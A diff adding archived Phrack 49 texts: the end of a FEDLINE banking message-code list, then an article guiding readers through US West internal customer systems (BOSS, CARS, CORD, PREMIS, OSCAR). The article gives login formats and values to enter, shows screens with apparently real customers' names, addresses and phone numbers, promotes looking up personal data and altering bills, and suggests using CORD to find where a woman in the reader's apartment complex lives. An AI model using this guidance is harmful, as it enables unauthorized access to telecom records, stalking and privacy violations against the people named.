+Standards, Data Encryption Standard.  This file is not my attempt to 
+demystify its operation, but to provide a categorical list of the codes.  
+I accept no responsibility for anyone's use or misuse of the information 
+contained in this file.
+
+
+============================================================================
+
+
+                        Type and Subtype Code Definitions
+                           
+============================================================================
+
+
+
+
+Funds Transfer Messages.
+                           
+
+Accounting status of a message indicates how the message is
+to be processed into the FUNDS balances of the FEDLINE Reserve
+Account Monitor from the standpoint of the original DI.
+
+  Status Codes:
+                                D = Debit Transaction
+                                C = Credit Transaction
+                                N = Non-accountable Transaction
+
+                                (Valid for ALL Messages.)
+
+
+============================================================================
+
+
+
+
+                        Regular Funds Transfer Messages
+
+
+Type/Sub                  Acct. Status            Description
+~~~~~~~~                  ~~~~~~~~~~~~         ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+1000                          D                   Transfer of Funds
+
+1001                          N                   Request for Reversal
+                                                  of current day Funds
+                                                  Transfer
+
+1002                          D                   Transfer of Funds
+                                                  Reversal
+
+1003                          D                   Transfer of Funds Return
+                                                  (Sent by FRB only)
+
+1007                          N                   Request for Reversal of
+                                                  Prior Day Funds Transfer
+
+1008                          D                   Prior Day Transfer of
+                                                  Funds Reversal
+
+1020                          D                   Transfer of Funds
+                                                  Requiring As-Of
+                                                  Adjustment
+
+1031                          N                   Request for Customer
+                                                  Drawdown
+
+1032                          D                   Transfer Honoring Request
+                                                  for Customer Drawdown
+
+1033                          N                   Refusal of Request for
+                                                  Customer Drawdown
+
+1040                          D                   Structured Transfer
+                                                  of Funds.
+
+1090                          N                   Service Message regarding
+                                                  Funds Transfer
+
+
+============================================================================
+
+
+
+
+
+                        Foreign Funds Transfers
+
+
+Type/Sub                  Acct. Status            Description
+~~~~~~~~                  ~~~~~~~~~~~~         ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+1500                            D                 Transfer of Funds
+
+1501                            N                 Request for Reversal of
+                                                  Current Day Foreign
+                                                  Account Transfer
+
+1502                            D                 Transfer of Funds
+                                                  Reversal
+
+1503                            D                 Transfer of Funds
+                                                  Return
+                                                  (Sent by FRB only)
+
+1507                            N                 Request for Reversal of
+                                                  Prior Day Foreign Account
+                                                  Transfer
+
+1508                            D                 Prior Day Transfer of
+                                                  Funds Reversal
+
+1531                            N                 Foreign Account Request
+                                                  for Funds
+
+1532                            D                 Transfer Honoring
+                                                  Request for Funds
+
+1533                            N                 Foreign Account Refusal
+                                                  of Request for Funds
+
+1540                            D                 Structured Funds Transfer
+
+1590                            N                 Service Message regarding
+                                                  Foreign Account Transfer
+
+
+============================================================================
+
+
+
+
+
+                        Settlement Funds Transfer Messages
+
+
+Type/Sub                  Acct. Status            Description
+~~~~~~~~                  ~~~~~~~~~~~~         ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+1600                            D                 Transfer of Funds
+
+1601                            N                 Request for Reversal of
+                                                  Current Day Settlement
+                                                  Transfer
+
+1602                            D                 Transfer of Funds
+                                                  Reversal
+
+1603                            D                 Transfer of Funds
+                                                  Return
+                                                  (Sent by FRB only)
+
+1607                            N                 Request for Reversal of
+                                                  Prior Day Settlement
+                                                  Transfer
+
+1608                            D                 Prior Day Transfer of
+                                                  Funds Reversal
+
+1620                            D                 Funds Transfer Requiring
+                                                  As-Of Adjustment
+
+1631                            N                 Request for Bank-to-Bank
+                                                  Drawdown
+
+1632                            D                 Transfer Honoring Request
+                                                  for Bank-to-Bank Drawdown
+
+1633                            N                 Refusal of Request for
+                                                  Bank-to-Bank Drawdown
+
+1640                            D                 Structured Transfer of
+                                                  Funds
+
+1690                            N                 Service Message regarding
+                                                  Settlement Transfer
+
+3004                            N                 Check Return Item
+                                                  Notification
+
+3006                            N                 Check Return Item
+                                                  Cancellation
+
+3009                            N                 Check Return Item
+                                                  Duplicate Notification
+
+3090                            N                 Check Return Item
+                                                  Service Message
+
+
+============================================================================
+
+
+
+
+
+                        Securities Transfer Messages.
+
+
+Accounting status of message indicates how the message is to be
+processed into the SECURITIES balances of the FEDLINE Reserve Account
+Monitor from the standpoint of the original DI. For Securities
+messages, this should indicate the direction of the Cash side of the
+transaction.
+
+Type/Sub                  Acct. Status            Description
+~~~~~~~~                  ~~~~~~~~~~~~         ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+2000                            C                 Security Transfer Message
+
+2001                            N                 Request for Reversal of
+                                                  Security Transfer
+
+2002                            C                 Reversal of Security
+                                                  Transfer
+
+2008                            N                 Request for Shipment of
+                                                  Definitive Agency
+                                                  Securities
+
+2090                            N                 Service Message regarding
+                                                  Securities Transfer
+
+2500                            C                 Original Issue (OI)
+                                                  Transfer
+                                                  (Sent by FRB or
+                                                   Agency only)
+
+2501                            N                 Request for Reversal of
+                                                  OI Transfer
+
+2502                            C                 Reversal of OI Transfer
+
+2590                            N                 Service Message regarding
+                                                  OI Transfer
+
+2700                            C                 Government Agency
+                                                  Securities Charge
+                                                  (Sent by FRB or
+                                                   Agency only)
+
+2705                            C                 Adjustment to Government
+                                                  Agency Securities
+                                                  (Sent by FRB or
+                                                   Agency only)
+
+2790                            N                 Service Message regarding
+                                                  Government Agency
+                                                  Securities Charge
+
+2800                            D                 Government Agency
+                                                  Securities Credit
+                                                  (Sent by FRB or
+                                                   Agency only)
+
+2805                            D                 Adjustment to Government
+                                                  Agency Securities
+                                                  (Sent by FRB or
+                                                   Agency only)
+
+2890                            N                 Service Message regarding
+                                                  Government Agency
+                                                  Securities Credit
+
+8200                            N                 Conversion of Security
+                                                  from BE to Bearer
+
+8202                            N                 Reversal of BE to Bearer
+                                                  Conversion
+                                                  (Sent by FRB or 
+                                                   Agency only)
+
+8800                            N                 Conversion of Security
+                                                  from BE to Registered
+
+8802                            N                 Reversal of BE to
+                                                  Registered Conversion
+                                                  (Sent by FRB or
+                                                   Agency only)
+
+8900                            D                 Maturity Payment
+                                                  (Sent by FRB or 
+                                                   Agency only)
+
+8906                            D                 Interest Payment
+                                                  (Sent by FRB or 
+                                                   Agency only)
+
+8990                            N                 Service Message regarding
+                                                  Maturity and Interest
+                                                  Payments
+
+
+
+
+============================================================================
+
+
+
+
+
+                        Message Status Codes
+
+
+  A list of status codes that may appear on the bottom of your screen
+  while processing messages:
+
+
+ENTRY CODES - assigned when a message is entered or intentionally
+              withheld from transmission for a variety of reasons,
+              such as insufficient Local Reserve Account Monitor
+              funds. Includes messages which are not verified,
+              or warehoused for future transmission.
+
+
+                            ET  Entered Transaction
+                            EH  Entered to be held
+                            EW  Entered to be Warehoused
+                            MC  Marked for Correction
+                            MS  Marked for safe-stored
+                           
+                           
+HELD CODES - assigned when a message is intentionally detained from
+             further processing until a FEDLINE operator releases it.
+
+
+                            HT Held Transaction (by operator)
+                            HS Held by supervisory order
+                            HM Held by account monitor
+                            HO Held because terminal is off-line
+
+
+LOCAL COMPLETION CODES - assigned when a message has been warehoused and
+                         verified or canceled.
+
+
+                            VW Transaction Warehoused
+                            CN Transaction Canceled
+                            DN Done
+
+
+TRANSMISSION CODES - assigned when a message is ready for transmission or
+                     after transmission has been completed.  
+                     The transmission status of a message is updated by
+                     Short Acknowledgments and responses from the
+                     host computer.
+
+
+                            TQ Queued for Transmission
+                            TC Transmission Completed
+                            TH Transmission rejected by host
+                            TU Transmission Unconfirmed
+                            TA Transmitted and Accepted
+                            TR Transmitted and rejected
+                            TI Transmitted but intercepted
+
+
+============================================================================
+
+
+
+
+
+                        Batch Status Codes
+
+  The following list of status codes describes the processing condition
+  of an ACH batch.  A status code appears in the upper right corner of
+  the ACH batch header and batch balancing screens, as well as the
+  Return Item and Notification of Change screens. Status codes can be
+  used to retrieve batches from the Batch Selection Criteria Screens for
+  further processing.
+
+
+Entry Codes - assigned when a batch is created. Includes all batches which
+              are balanced and ready for collection.
+ 
+ 
+                            ET Entered
+                            VR Verified / Balanced
+                           
+                           
+Local Completion Codes - assigned when a batch has been canceled
+
+
+                            CN Canceled
+                           
+                           
+Transmission Codes - assigned when a batch is selected and queued for    
+                     transmission. Includes batches that were not
+                     transmitted due to an error.
+
+
+                            CL Collected
+                            IP Interrupted Processing
+                           
+                           
+============================================================================
+
+
+
+
+
+                        File Status Codes
+
+    The following list of status codes describes the processing
+    condition of ACH files.
+
+
+Entry Codes - assigned when a file is created or received.
+ 
+ 
+                            ET File Created 
+                            RC File Received 
+
+
+Local Completion Codes - assigned after an incoming file has been processed
+                         from the FRB.
+
+
+                            RP File Received and Processed
+
+
+Transmission Codes - assigned when a file is queued for transmission or
+                     after transmission has been completed.  Includes
+                     files which were not transmitted due to some
+                     processing error.
+ 
+ 
+                            TQ File created and queued in PC
+                            TC Transmitted complete to host queue
+                            IP Interrupted Processing
+
+
+============================================================================
diff --git a/phrack49/13.txt b/phrack49/13.txt
new file mode 100644
index 0000000..00f4aca
--- /dev/null
+++ b/phrack49/13.txt
@@ -0,0 +1,849 @@
+                              .oO Phrack 49 Oo.
+
+                          Volume Seven, Issue Forty-Nine
+
+                                    13 of 16
+
+
+
+                .-----------------------------------------.
+                | Telephone Company Customer Applications |
+                |-----------------------------------------|
+                |            Voyager[TNO]                 |
+                `-----------------------------------------'
+
+
+Telco's use many types of software.  In addition to the run-of-the-mill
+employee applications such as OfficeVisions, PROFS, and the usual trashy
+selection of DOS/Win applications, telco's use two types of much more
+interesting software:
+
+	. Customer applications
+	. Provisioning applications
+
+Customer applications are used by telco personnel to deal with customer
+issues, such as billing and service orders.  Provisioning applications are
+used to deal with the actual phone network itself.
+
+Customer applications include BOSS, CARS, CORD, SOLAR, SOPAD, OSCAR, and
+PREMIS.  Provisioning applications include FACS, March, April, COSMOS,
+Switch and FOMS/FUSA.
+
+Most of what has been written regarding telco software covered provisioning
+applications.  While much can be done with provisioning applications, you
+will soon see the incredible opportunities offered by Customer
+Applications.  Within the family of Customer Applications you will find the
+ability to locate personal information, look up addresses by telephone
+number, and modify customer bills.
+
+Experienced dumpster divers will recognize many of the screens shown in
+this article.
+
+
+
+                .------------------------------.
+                | Part I: Billing Applications |
+                `------------------------------'
+
+BOSS
+~~~~
+BOSS (Billing and Order Support System) contains bill and credit
+information, equipment information, carrier billing information, customer
+contact notes and payment history.  BOSS is used in the Central and Eastern
+Territories of U.S. West.  To login to BOSS, you must enter your a ID, a
+two character alphanumeric office code, and a five character password.
+BOSS passwords expire after 30 days and cannot be re-used.
+
+BOSS is operated largely with PF keys:
+
+	PF1  = ENTRY	(Entry Screen)
+	PF2  = BILL	(Entity and Summary Bill)
+	PF3  = IC	(Itemized Calls)
+	PF4  = OCC	(Other Charges and Credits)
+	PF5  = CSR	(Customer Service Record)
+	PF6  = PREV	(Previous Months Bill)
+	PF7  = NEXT	(Next)
+	PF8  = Note	(Notations)
+	PF9  = ASUM	(Adjustments Summary)
+	PF10 = COMPUTE	(Compute)
+	PF11 = F/B	(Forward/Back)
+
+
+PF2 will bring up the Billing Screen, which will show you the contact names
+and telephone numbers for the account you are looking at.  The CSBL screen
+is completely covered with information, and it is impossible to get
+everything out of it without careful study.  There are at least two
+versions of BOSS in use, this screen is a mix of the two that I am familiar
+with:
+
++-----------------------------------------------------------------------------+
+|CMD                                    MSG COMMAND COMPLETED (I210)          | 
+|(a)303 265 8545 (b)153 (c)NP (d)JAN 16 93 *CSBL (e)LIVE       (f)DNV (g)1FR  |
+|(h)DARIN STOREY         (i)PB 0205 (m)RT     (q)AC D-00 (t)DEP 0 CN  (x)BD N |
+|515-D GIRARD BLVD S E   (j)R1 0126 (n)ES     (r)CT      (u)DOI 030492 (y)LCU |
+|BOULDER CO        80301 (k)R2 0216 (o)NT C A (s)NOB     (v)TAX FSLCF- (z)LCR |
+|                        (l)R3 0224 (p)PPD               (w)TAR AJ     (A)LAL |
+|                       (B)CI   SEARS  SUPVSR 2426767 MS  SANDI SM POE NLR    |
+|DAD MICHAEL STOREY 2755595                        (C)CBR                     |
+|        (D)SSN           (E)VL (F)TRT HIST 059511111111      (G)CIV 0290     |
+|                               (H)RCK HIST 000000000000  (I)PAH              |
+|                            PREV BL    168.55       CUR BL      116.24       |
+|                             PAY & ADJ PREV BILL    PAY AND ADJ CURR BILL    |
+|                            DATE  T     AMOUNT     DATE  T       AMOUNT      |
+|                             1223 01   101.15                                |
+| (J)010        30.42                                                         |
+|    221         9.03                                                         |
+|    300         9.39                                                         |
+| (K)CCG        48.84                                                         |
+| (L)BAL        67.40                                                         |
+| (M)TOT       116.24                            (N)CUR DUE    116.24         |
+| (O)RP  (P)NOTATION                    (Q)TYPE  (R)PN  (S)ACT  (T)FU  (U)BD  |
+|                                                                   0193 (V)+ |
++-----------------------------------------------------------------------------+
+
+Legend:	
+        (a) Telephone number
+	(b) Customer code
+	(c) Listing Type		(See below)
+	(d) Most current bill date
+	(e) Account Status Code		(See below)
+	(f) Alpha code for the serving exchange
+	(g) Class of service		(See below)
+	(h) Billing name
+	(i) Pay-By-Date, month and day payment is due
+	(j) Previous months denial date
+	(k) Date first collection notice is sent out
+	(l) Date account will be denied and referred to CMC
+	(m) Remove from treatment amount
+	(n) Entity Status		(See below)
+	(o) No Treatment Indicator	(See below)
+	(p) Preferred Payment Date
+	(q) Account Classification (credit classification)
+	(r) Carryover Treat History (unimplemented)
+	(s) Number of bills the customer receives
+	(t) Total deposit held on the account 
+	(u) Date of Installation
+	(v) Tax Code
+	(w) Tax Area Code
+        (x) Bank Draft
+	(y) Local Units Used (unimplemented)
+	(z) Local Usage Units Credited (unimplemented)
+	(A) Local Usage Units Allowed (unimplemented)
+	(B) Credit Information
+	(C) Can Be Reached 
+	(D) Social Security Number
+	(E) Central Office is Voice Link capable
+	(F) Treatment History (read right to left)
+	(G) Credit Information Verified (date CI was last verified)
+	(H) Returned Check History (read right to left)
+	(I) Previous Account History
+	(J) Charges by Entity (charges from AT&T, MCI, etc...)
+	(K) Current Charges
+	(L) Balance from the previous bill
+	(M) Total 
+	(N) Current Due
+	(O) Responsible Party
+	(P) Notation
+	(Q) Type code
+	(R) Position Number (BOSS user position number)
+	(S) The action to be taken
+	(T) Follow-up date
+	(U) Bill Date
+        (V) Notation Indicator (+ means there are display pages of notations)
+                               (P means there are permanent notations)
+
+Listing types include:
+
+	NP		Non-Published
+	NL or NLIST 	Non-Listed
+	<null>		Published
+
+
+Account Status Codes are shown in order of priority.  SNP, SUSP, DISC,
+OCAx, LEGX and W-OFF codes are highlighted on the screen.  Account Service
+Codes include:
+
+	OCAx	Account has been referred to an outside collection agency
+	LEGX	Account has been referred to legal
+	W-OFF   Written OFF FINAL BILL
+	FIN-R	Revised final bill
+	FIN-I	Initial Final Bill
+	DISC	Service has been disconnected
+	SNP	Service has been interrupted for non-payment
+	SUSP	Service has been temporarily suspended at customer request
+	INIT	Initial bill
+	LIVE	Live bill
+	SCD	Select Carrier Denial
+
+
+Class of Service Codes include:
+
+	1FR	One Flat Rate
+	1MR	One Measured Rate
+	1PC	One Pay Phone
+	CDF	DTF Coin
+	PBX	Private Branch Exchange (Direct Inward Dialing ext.)
+	CFD	Coinless ANI7 Charge-a-Call
+	INW	InWATS
+	OWT	OutWATS
+	PBM	0 HO/MO MSG REG (No ANI)
+	PMB	LTG = 1 HO/MO Regular ANI6
+
+Entity Status is used to restrict access to toll services.  The three digit
+carrier code is listed, followed by the letters S, C or F.
+
+If the NT (No Treatment Indicator) is C, the computer sends out a late
+notice on the R2 date.  If the NT is T, there is a temporary reprieve and
+the computer will not sent out a late notice this month.  If the NT is M or
+P, late notices are never sent.
+
+PF11 from this screen will take you through the entity CSBL's.
+
+PF5 will show you the customers Current Service Record.  The CSR screen
+will look something like this:
+
++-----------------------------------------------------------------------------+
+|CMD                                           MSG                            |
+|(a)303 864 2475 (b)298 NP (c)NOV 10 99    *CSR        (d)P  1  2    DNV 1FR  |
+|(e)BARBARA ANDERSON FOR                                                      |
+|XSBN 2-864-2475                                                              |
+|        (f)---LIST                                                           |
+|                  NP   (NP) ANDERSON, DARRYL B                               |
+|                  LA   5425 ROWLAND CT                                       |
+|        (g)---BILL                                                           |
+|                  BN1  BARBARA	ANDERSON FOR                                  |
+|                  BN2  DARRYL B ANDERSON                                     |
+|                  BA1  5425 ROWLAND CT                                       |
+|                  PO   80301 /TAR GQ                                         |
+|        (h)---S&E                                                            |
+|                                   (i)ORIG SERV ESTAB 8-17-78                |
+|(j)     (k)                    (l)                    (m)       (n)          |
+|20182   1825                   NPU   /1000            1.31      1.31         |
+|41481   7001                   TTR   /1000            1.12      1.12         |
+|82585   3793                   1FR   /1000/PICX288    5.60      5.60         |
+|41481   2140                   KH9   /1000            .00        .00         |
+|22782   5106                   WMR   /1000/D          .56        .56         |
+|41481   7001                   RJ11C /1000/D          .00        .00         |
+|                                                                             |
+|RP      NOTATION               TYPE   PN              ACT FU BD              |
+|                                                                  1299       |
++-----------------------------------------------------------------------------+
+
+Legend:	
+        (a) Telephone number
+	(b) Customer code
+	(c) Most current bill date
+	(d) Page number
+	(e) Billing name
+	(f) LIST section containing listed name and address
+	(g) BILL section containing billing name and address
+	(h) S&E section containing products and service
+	(i) Date original service was established
+	(j) Date each service was installed
+	(k) Last 4 digits of order number that put service online
+	(l) USOC's representing the products and services on the account
+	    (See below)
+	(m) Monthly rate for each USOC
+	(n) Amount billed for USOC total
+
+USOC Codes include:
+
+	ESC	Three Way Calling
+	ESF	Speed Calling
+        ESL     Speed Calling 8 Code
+	ESM	Call Forwarding
+	ESX	Call Waiting
+	EVB	Busy Call Forward
+	EVC	Busy Call Forward Extended
+	EVD	Delayed Call Forwarding
+	HM1	Intercom Plus
+	HMP	Intercom Plus
+	MVCCW	Commstar II Call Waiting
+
+
+
+PF8 allows you to view the notes the telco is keeping on the customer. This
+is not a free-form notes screen, but is instead very structured. Notes are
+automatically deleted after two months unless the type code PERM is used.
+
++-----------------------------------------------------------------------------+
+|CMD                                           MSG                            |
+|303 864 2475 2298 NP 3NOV 10 99    *CSR        P  1  2    DNV 1FR            |
+|                                                                             |
+|BARBARA ANDERSON FOR                                                         |
+|                                                                             |
+|DATE  RP     NOTATION                                 USR  TYPE  PN  ACT  FU |
+|1209  1988   ESTAB FREE 976 BLOCK 12-9-88             LTR  PERM              |
+|0324  BARB   SLD CCS DD 3-1                           SKJ  PSOC              |
+|0213  NONE                                            NBV  CHK               |
+|0213  BARB   LOST BL ND DUPT SNT ASAP. AGRD ML COPY   NBV  MISC              |
+|             TDA. VRFY BL ADDR                                               |
+|                                                                             |
+|RP           NOTATION                                 TYPE PN  ACT  FU BD    |
+|                                                                      1299   |
++-----------------------------------------------------------------------------+
+
+Valid type codes include: 
+
+	MISC	Miscellaneous
+	CHK	Account review or pulled up wrong account 
+	PERM 	Permanent
+	PASS 	Contact Passed Intra Company
+	MORE	More data follows on an additional screen
+	OTHM	Carrier toll and inquiry
+	OHTD	Carrier toll and inquiry
+        OTHB    Non-specific billing question
+	PSON	New connect, order negotiation
+        CPN     New connect, order canceled
+	QPON	New connect, order inquiry
+
+
+
+CARS
+~~~~
+CARS (Customer Access and Retrieval System) is used in the Western
+Territories of U.S. West.  CARS stores bill and credit information,
+equipment information, carrier billing information, customer contact notes
+and payment history.  CARS user id's are six characters and normally begin
+with a 'B' for business.  CARS passwords (lockwords, in U.S. West parlance)
+are from 4 to either characters and must contain at least one alpha and one
+numeric character.  CARS passwords expire after 30 days.  You will also be
+asked for a Project Code (use 'M'), a Group Code (use 'G') and a Position
+#.  The Position # consists of a pair of two character fields.  The first
+two characters are the office code and the second two characters identify
+the individual employee.  The CARS interface is quite similar to the BOSS
+interface.  The function keys for CARS are:
+
+	PF1  = LDD 	(Long Distance Detail)
+	PF2  = CSBL 	(Current Status Bill)
+	PF3  = BILL 	(Bill Detail)
+	PF4  = QTFU 	(Query/Treatment Follow-Up)
+	PF5  = CCSR	(Current Customer Service Record)
+	PF6  = PREV	(Previous Month's Information)
+	PF7  = PADJ	(Payment and Adjustments)
+	PF8  = NOTE	(Notations)
+	PF9  = ABIL	(Adjustment Bill)
+	PF10 = COMPUTE	(Compute)
+	PF11 = F/B	(Forward/Back)
+	PF12 = BESS	(Billed Entry Status Screen)
+
+
+PF2 will bring up the CSBL (Current Service Bill) screen, which shows you
+the "can be reached" numbers and names for the account you are looking at.
+
+PF5 will bring up the Current Service Record (CSR).  A CARS CSR screen
+resembles a BOSS CSR screen:
+
++-----------------------------------------------------------------------------+
+|CMD___________________________________________    Q:                         |
+|(a)303 864 2475 (b)2298 72W (c)NOV 10 99  *CCSR* LIVE (d)P00001     COS      |
+|(e)BARBARA ANDERSON FOR        SEA 1FB         TAX FSL                       |
+|        (f)---LIST                                                           |
+|                  NP   (NP) ANDERSON, DARRYL B                               |
+|                  LA   5425 ROWLAND CT                                       |
+|        (g)---BILL                                                           |
+|                  TAR  1700                                                  |
+|                  MCN  NXWAC                                                 |
+|                  COS  852-9200S                                             |
+|                  BN1  BARBARA	ANDERSON FOR                                  |
+|                  BN2  DARRYL B ANDERSON                                     |
+|                  BA1  5425 ROWLAND CT                                       |
+|        (h)---S&E                                                            |
+|                  ENT  000                                                   |
+|(i)        (j)       (qty)   (k)                         (l)    (tax codes)  |
+|02/18/92   05/18/90    1     FB/TN 621-2475/PIC XXX/LPS  42.10     &#        |
+|02/16/90   05/18/90    1     HSO/TN 621-2475/SLS          2.00     &#        |
+|                             377000                                          |
+|02/16/90   02/16/90    1     TTB/TN 621-2475/SLS          0.00     &         |
+|                             377000                                          |
+|02/16/90   02/16/90    1     9ZR/TN 621-2475/SLS          4.22               |
+|                             377000                                          |
+|RP-___________NOTE_________________________________________________________  |
+|____________________________TYPE_____FLUP_____PN_____ACT_____BD_____USR_____ |
++-----------------------------------------------------------------------------+
+
+Legend:	
+        (a) Telephone number
+	(b) Customer code
+	(c) Most current bill date
+	(d) Page number
+	(e) Billing name
+	(f) LIST section containing listed name and address
+	(g) BILL section containing billing name and address
+	(h) S&E section containing products and service
+	(i) Date original service was established
+	(j) Date each service was installed
+	(k) USOC's representing the products and services on the account
+	(l) Monthly rate for each USOC
+
+
+Just as with BOSS, PF8 brings up the NOTE screen.  The CARS NOTE screen
+differs slightly from the BOSS NOTE screen:
+
++-----------------------------------------------------------------------------+
+|CMD__________________________________________________________           O:   |
+|303 864 2475  298 NP  NOV 10 99    *NOTES*        L00001                     |
+|BARBARA ANDERSON FOR          SEA 1FB            LC     00     TAX   FSLC    |
+|                                                                             |
+|DATE  RP     NOTATION                            USR  OFC  TYPE  PN  ACT  FU |
+|1209  1991   DISCUSS BILL ONLY WITH BARBARA      LTR  TS1  PERM              |
+|0324  BARB   C015364  DD  030199                                             |
+|             SLD CCS                             SKJ  D18  PSOC              |
+|0213  NONE                                       NBV  TS1  CHK               |
+|0213  BARB   LOST BL ND DUPT SNT ASAP. AGRD                                  |
+|             ML COPY TDA. VRFY BL ADDR           NBV  TS1  MISC              |
+|                                                                             |
+|RP           NOTATION                            TYPE  PN  ACT   FU    BD    |
+|                                                                      1299   |
++-----------------------------------------------------------------------------+
+
+Valid type codes include: MISC, CHK, PERM and PASS.
+
+
+
+                .-------------------------------------.
+                | Part II: Service Order Applications |
+                `-------------------------------------'
+
+CORD
+~~~~
+CORD (Customer Order Retrieval and Display) is used in the 206, 503 and 509
+NPA's.  CORD has three functions:
+
+        . Accessing service orders by order number
+        . Locating order numbers by telephone number
+        . Locating order numbers by telephone prefix
+
+Let's say you know that an attractive young lady is moving into your
+apartment complex but you don't know her apartment number or her telephone
+number.  Connect to CORD and pull up all of the service orders for the
+apartment complex's prefix and scan them until you find one in the
+apartment complex on or near the date she moved in.  It's much easier if
+you have at least a first name.
+
+To use CORD, you will need to know the code for your NPA.  206 is 0, 503 is
+5 and 509 is 6.
+
+
+SOLAR
+~~~~~
+SOLAR (Service Order Logistics and Reference) is used in Southern 308, 319,
+402, 515, 605 and 712.  In addition, SOLAR is used in Northern 218, 507,
+612 and 701.  I do not know of an NPA where SOLAR is used exclusively.
+SOLAR has two capabilities:
+
+        . Accessing service orders by order number
+        . Accessing service orders by telephone number
+
+
+SOPAD
+~~~~~
+SOPAD (Service Order Provisioning and Distribution) is used in 208, 303
+(TNOland), 307, 406, 505, 602, 719 and 801.  SOPAD has two capabilities:
+
+        . Accessing service orders by order number
+        . Accessing service orders by telephone numbers
+
+
+
+                .--------------------------------------.
+                | Part III: Miscellaneous Applications |
+                `--------------------------------------'
+
+PREMIS
+~~~~~~
+PREMIS (Premises Information System) is a geographical database designed by
+BellCore and used by various telco's across the country.  Using Premis, an
+employee can do customer lookups by telephone number (CNA), check for
+multiple subscribers at an address (upstairs/downstairs), and view account
+status.  PREMIS can be used directly, but it is also used by applications
+such as SONAR (Service Order Negotiation and Retrieval).
+
+To do successful PREMIS lookups, you will need to be able to encode your
+requests in the proper format.  This is very difficult unless to do this on
+a regular basis. To make matters more difficult, "proper format" differs
+from area to area, even within the same RBOC! Particularly difficult are
+trailer parks, nursing homes, military bases and indian reservations.
+
+The PREMIS input screen looks like this:
++-----------------------------------------------------------------------------+
+|REQ PREM (a)                                                                 |
+|SAGA (b)                                                                     |
+|ADDR (c)                                                                     |
+|LOC APT (d)                    FLR             BLDG                          |
+|AHN (e)                RT      BOX (h)                                       |
+|COM (f)        TN (i)            LN (j)                STATUS (k)            |
+|                                                                             |
+|DAC (g)                                                                      |
++-----------------------------------------------------------------------------+
+
+        (a) Screen name (Request PREMIS)
+        (b) Street Address Guide Area (see below)
+        (c) Address
+        (d) Location or apartment
+        (e) Assigned House Number
+        (f) Community
+        (g) Destination Address Code
+        (h) Route and Box
+        (i) Telephone Number
+        (j) Line Number
+        (k) Status
+
+Valid SAGA codes include:
+
+        CHY     Northern Wyoming
+        CPR     Southern Wyoming
+        DNV     Denver, Colorado
+        IDO     Idaho
+        MTA     Montana
+        NCO     Northern Colorado
+        SCO     Southern Colorado
+        NMX     New Mexico
+        PNX     Phoenix
+        TSN     Tucson
+        UTA     Utah
+        NE      Nebraska
+
+
+If the PREMIS database was able to understand your query and find the
+address information, you will see an output screen that looks like this:
+
++-----------------------------------------------------------------------------+
+|REQ PREM TCAT (a)                 L# 1 BD (b)                                |
+|SAGA MN (c)    EMP                   NMX                                     |
+|ADDR 7821 LYNDALE AV S                                                       |
+|LOC APT 11                     FLR             BLDG                          |
+|AHN               RT           BOX                                           |
+|COM***BLMGTN                              ST MN                              |
+|         TN                       LN                           STATUS        |
+|                                                                             |
+|DES (d)                                                                      |
+|DESCRIP (e) LYNDALE LODGE                                                    |
+|    ZIP    55420    EX(f) MPLS  WC(g)  612881  NPA(h) 612   RZ(i)   00  RE(j)|
+|     BO             DIR         RTZ(k) 2       CO(l)  881   LCL(m)  1ESS     |
+|     PC(n) FDT,SAT  TELF(o)1ES  TAR(p) OTHR    PD(q)                         |
+| (r)RMK                                                                      |
+|                                                                             |
+| (s)RMKT SCD: NPS ATX                                                        |
+|                                                                             |
+| (t)RMKB LCC IS LCT #                               (v)   (w)   (x)   (y)    |
+|    (u)STAT NON-WORK      06-23-96 TN 612 505-1942  CT Y  CNF N DIP N CS 1FR |
+|LN JORGENSEN,ROBERT C & DIANE                         MWS NONE               |
+|                                                                             |
+|DAC (z)                         +PIC          +PIC          +PIC             |
++-----------------------------------------------------------------------------+
+     
+        (a) Screen name (Request PREMIS Telephone Category)
+        (b) Line ID number (Customer's 1st line, 2nd line, etc...)
+        (c) Street Address Guide Area
+        (d) Descriptive field
+        (e) Descriptive address
+        (f) Exchange
+        (g) Wire Center
+        (h) Numbering Plan Area
+        (i) Resistance Zone
+        (j) Ringer Equivalence
+        (k) Rate Zone
+        (l) Central Office
+        (m) Local (switch type)
+        (n) SAT means flow through orders can be negotiated.
+            ASAT in this field means Saturday installer visits
+            can be negotiated.
+        (o) Telephone Features (switch type)
+        (p) Tax Code
+        (q) Plant District Code
+        (r) Remark
+        (s) Remark Basic
+        (t) Remark Telephone
+        (u) Status (see below)
+        (v) Connect Through
+        (w) Connected Facilities (service uninterrupted from previous tenant)
+        (x) Dedicated Inside Plant
+        (y) Class of Service
+        (z) Destination Address Code
+
+Valid statuses are:
+
+        NON-WORKING     Non-working
+        WORKING         Working
+        PEND-OUT        Pre-completion disconnect
+        SUSPEND         Temporary denial for nonpayment
+        UNKNOWN         Unknown
+
+
+
+OSCAR
+~~~~~
+OSCAR (Optical Storage COM Application Replacement) is a application for
+archival and retrieval of microfiche files used in customer service. OSCAR
+will store the data from BOSS or CARS for up to 30 years.  OSCAR is
+operated with these PF keys:
+
+        PF1  = Main Menu
+        PF2  = Bill
+        PF3  = Print Verification Screen (and duplicate bill printing)
+        PF6  = Previous Bill
+        PF7  = Next Bill
+        PF11 = Forward/Backward
+
+The OSCAR Main Menu will look something like this:
++-----------------------------------------------------------------------------+
+|CMD  (a)                                       MSG (e)                       |
+|                                                                             |
+|                              OSCAR/ONLINE                                   |
+|                                  MENU                                       |
+|                                                                             |
+|       TN: (b)                    CUS:         SUF:                          |
+|       DATE: (c)                  PRINT RANGE: (f)     FINAL: (g)            |
+|       ACCT CENTER: (d)           SUBPEONA: (h)                              |
+|                                                                             |
+|                                                                             |
+| F1=MENU     F2=BILL     F3=PRINT     F4=N/A       F5=N/A       F6=PREV      |
+| F7=NEXT     F8=N/A      F9=N/A       F10=N/A      F11=F/B      F12=N/A      |
++-----------------------------------------------------------------------------+
+
+        (a) Command section
+        (b) Customer telephone number
+        (c) Date (MMYY)
+        (d) Account center              (see below)
+        (e) Message section
+        (f) Print Range (number of months to print bills for)
+        (g) Final (Y for final, blank for not final)
+        (h) Reserved for the Subpeona Compliance Group
+
+
+Account Center codes are:
+
+        CO      Colorado and Wyoming
+        NM      New Mexico and Arizona
+        NO      North Dakota and Minnesota
+        OR      Oregon
+        SO      South Dakota, Nebraska, and Iowa
+        UT      Utah, Idaho, and Montana
+        WA      Washington
+
+
+PF2 will bring you to the first OSCAR Bill screen, which will look
